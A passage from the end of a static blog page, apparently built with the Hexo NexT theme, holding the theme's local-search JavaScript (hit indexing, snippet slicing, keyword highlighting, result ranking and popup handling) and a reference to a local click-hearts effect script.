                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'true') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>